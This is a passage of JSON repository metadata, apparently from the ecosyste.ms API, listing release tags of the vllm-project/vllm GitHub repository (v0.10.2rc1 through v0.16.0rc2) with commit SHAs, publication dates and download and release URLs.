name":"v0.16.0rc2","sha":"c44d0c6d6681d712ca66f5b18a7772bd487f4844","kind":"commit","published_at":"2026-02-11T10:33:40.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.16.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.16.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.16.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc2/manifests"},{"name":"v0.16.0rc1","sha":"22b64948f6f4381bce7ac8ec0487020f0129e1cb","kind":"commit","published_at":"2026-02-09T06:42:38.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.16.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.16.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.16.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc1/manifests"},{"name":"v0.15.2rc0","sha":"bbe0574d8e51c1c5935aeff9e92040c61d1d59c5","kind":"commit","published_at":"2026-02-05T00:49:18.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.2rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.2rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.2rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.2rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.2rc0/manifests"},{"name":"v0.15.1","sha":"1892993bc18e243e2c05841314c5e9c06a80c70d","kind":"commit","published_at":"2026-02-04T01:28:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.1/manifests"},{"name":"v0.15.1rc1","sha":"1892993bc18e243e2c05841314c5e9c06a80c70d","kind":"commit","published_at":"2026-02-04T01:28:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.1rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.1rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.1rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.1rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.1rc1/manifests"},{"name":"v0.15.1rc0","sha":"9cd2cce17dc8c418d06d83804f009c87316768d6","kind":"commit","published_at":"2026-02-03T08:07:18.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.1rc0/manifests"},{"name":"v0.16.0rc0","sha":"133765760b21fde228bf1ca19fa4b35b5c206359","kind":"commit","published_at":"2026-01-29T22:12:35.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.16.0rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.16.0rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.16.0rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.16.0rc0/manifests"},{"name":"v0.15.0","sha":"f176443446f659dbab5315e056e605d8984fd976","kind":"commit","published_at":"2026-01-29T06:47:10.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0/manifests"},{"name":"v0.15.0rc3","sha":"fe18ce4d3f926b255212f297dcd17dcdd0aaa77b","kind":"commit","published_at":"2026-01-28T19:44:59.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc3/manifests"},{"name":"v0.15.0rc2","sha":"5f7f9ea88415cf9753910ab4f4cd904bb9973d9b","kind":"commit","published_at":"2026-01-28T10:17:19.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc2/manifests"},{"name":"v0.15.0rc1","sha":"58996f3589434d99c320e6ee2460a231135f9641","kind":"commit","published_at":"2026-01-27T07:16:43.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc1/manifests"},{"name":"v0.15.0rc0","sha":"cf1167e50b809f18efd21fb3418dd75d2805b14f","kind":"commit","published_at":"2026-01-26T20:37:16.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.15.0rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.15.0rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.15.0rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.15.0rc0/manifests"},{"name":"v0.14.1","sha":"d7de043d55d1dd629554467e23874097e1c48993","kind":"commit","published_at":"2026-01-23T22:22:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.14.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.1/manifests"},{"name":"v0.14.0","sha":"b17039bccc17b94a2ea107272ad7bc93508708df","kind":"commit","published_at":"2026-01-17T05:04:48.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.14.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0/manifests"},{"name":"v0.14.0rc2","sha":"7f42dc20bb2800d09faa72b26f25d54e26f1b694","kind":"commit","published_at":"2026-01-16T02:00:21.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.14.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.14.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.14.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0rc2/manifests"},{"name":"v0.14.0rc1","sha":"11b6af5280d6d6dfb8953af16e67b25f819b3be9","kind":"commit","published_at":"2026-01-13T05:46:53.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.14.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.14.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.14.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0rc1/manifests"},{"name":"v0.14.0rc0","sha":"6a09612b2e0e09d037a220ea8115632b8084e008","kind":"commit","published_at":"2025-12-19T01:34:27.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.14.0rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.14.0rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.14.0rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.14.0rc0/manifests"},{"name":"v0.13.0","sha":"72506c98349d6bcd32b4e33eec7b5513453c1502","kind":"commit","published_at":"2025-12-18T22:07:04.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.13.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0/manifests"},{"name":"v0.13.0rc4","sha":"55f1fc1b1b4044e5b5055c968cf6d956a865476f","kind":"commit","published_at":"2025-12-18T03:57:52.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.13.0rc4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.13.0rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.13.0rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc4/manifests"},{"name":"v0.13.0rc3","sha":"f124b56786212f86caf7ce0a66e3d3c4c0720a62","kind":"commit","published_at":"2025-12-17T08:30:39.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.13.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.13.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.13.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc3/manifests"},{"name":"v0.13.0rc2","sha":"f34eca5f0141088fef5b81a933f9869e1a04f188","kind":"commit","published_at":"2025-12-17T01:16:25.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.13.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.13.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.13.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc2/manifests"},{"name":"v0.13.0rc1","sha":"7d80c73d4277187d0468f15a22bba959ce853261","kind":"tag","published_at":"2025-12-10T02:40:40.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.13.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.13.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.13.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.13.0rc1/manifests"},{"name":"v0.12.0","sha":"4fd9d6a85c00ac0186aa9abbeff73fc2ac6c721e","kind":"commit","published_at":"2025-12-03T04:38:43.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.12.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.12.0/manifests"},{"name":"v0.11.2","sha":"275de34170654274616082721348b7edd9741d32","kind":"commit","published_at":"2025-11-19T22:11:21.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"439368496db48d8f992ba8c606a0c0b1eebbfa69","kind":"commit","published_at":"2025-11-18T08:20:45.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1/manifests"},{"name":"v0.11.1rc7","sha":"f67299f66d71b593401b1f77540726005dfe67da","kind":"commit","published_at":"2025-11-16T06:05:00.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc7","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc7/manifests"},{"name":"v0.11.1rc6","sha":"30700b1cd7de51f191be718215a58f5a8ddcb8aa","kind":"commit","published_at":"2025-11-10T22:36:11.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc6","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc6/manifests"},{"name":"v0.11.1rc5","sha":"2918c1b49c88c29783c86f78d2c4221cb9622379","kind":"commit","published_at":"2025-10-30T17:36:56.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc5/manifests"},{"name":"v0.11.1rc4","sha":"f257544709a8d9ccb8947e6f2c1779988c448ae7","kind":"commit","published_at":"2025-10-29T02:39:15.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc4/manifests"},{"name":"v0.11.1rc3","sha":"83f478bb19489b41e9d208b47b4bb5a95ac171ac","kind":"commit","published_at":"2025-10-25T00:23:53.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc3/manifests"},{"name":"v0.11.1rc2","sha":"c9461e05a4ed3557cfbf4b15ded1e26761cc39ca","kind":"commit","published_at":"2025-10-22T16:13:18.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc2/manifests"},{"name":"v0.11.1rc1","sha":"c3a722fcb2c95c61af3ce5e822b6eb8285abeb85","kind":"commit","published_at":"2025-10-14T18:38:59.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc1/manifests"},{"name":"v0.11.0","sha":"b8b302cde434df8c9289a2b465406b47ebab1c2d","kind":"commit","published_at":"2025-10-10T18:15:45.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"01efc7ef781391e744ed08c3292817a773d654e6","kind":"commit","published_at":"2025-10-07T20:40:13.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2/manifests"},{"name":"v0.11.0rc6","sha":"f71952c1c49fb86686b0b300b727b26282362bf4","kind":"commit","published_at":"2025-10-03T05:22:31.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0rc6","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc6/manifests"},{"name":"v0.11.0rc5","sha":"c75c2e70d637b7b13facac0e82ad94f9216dcf13","kind":"commit","published_at":"2025-10-02T17:35:51.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0rc5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc5/manifests"},{"name":"v0.11.0rc4","sha":"e4beabd2c8865acdcad52f57cf13b8ba2b5ae6ab","kind":"commit","published_at":"2025-10-01T05:47:42.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0rc4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc4/manifests"},{"name":"v0.11.0rc3","sha":"8ce5d3198d00631a76e1aa02a57947b46bc7218c","kind":"commit","published_at":"2025-09-29T05:55:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc3/manifests"},{"name":"v0.11.0rc2","sha":"4c347044c90da878c9bacb33aaf6cba0fc01dd7c","kind":"commit","published_at":"2025-09-28T06:35:12.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc2/manifests"},{"name":"v0.11.0rc1","sha":"b761df963c2032144468a99bcb39a11e73e16ca4","kind":"commit","published_at":"2025-09-26T17:26:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.0rc1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.0rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.0rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.0rc1/manifests"},{"name":"v0.11.1rc0","sha":"b761df963c2032144468a99bcb39a11e73e16ca4","kind":"commit","published_at":"2025-09-26T17:26:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.11.1rc0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.11.1rc0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.11.1rc0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.11.1rc0/manifests"},{"name":"ci/build/22474","sha":"e925187f6da7ead49ad94d6aafc2db2623ff9a30","kind":"commit","published_at":"2025-09-13T14:38:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/ci/build/22474","html_url":"https://github.com/vllm-project/vllm/releases/tag/ci/build/22474","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@ci%2Fbuild%2F22474","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/ci%2Fbuild%2F22474","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/ci%2Fbuild%2F22474/manifests"},{"name":"v0.10.2rc3","sha":"da3fa78dc98f3001e5fb703729a77311146e0cd3","kind":"commit","published_at":"2025-09-13T06:03:56.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.2rc3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.2rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.2rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2rc3/manifests"},{"name":"v0.10.2rc2","sha":"880c741bb6d755c1da25d51e10985b4fa06671bd","kind":"commit","published_at":"2025-09-12T01:16:43.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.2rc2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.10.2rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.10.2rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.10.2rc2/manifests"},{"name":"v0.10.2rc1","sha":"b8a93076d36eff5cff8a89f99a7370d0cc6f0e98","kind":"commit","published_at":"2025-09-09T18:05:25.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.10.2rc1","html_url":"https://github.com/vllm-project/v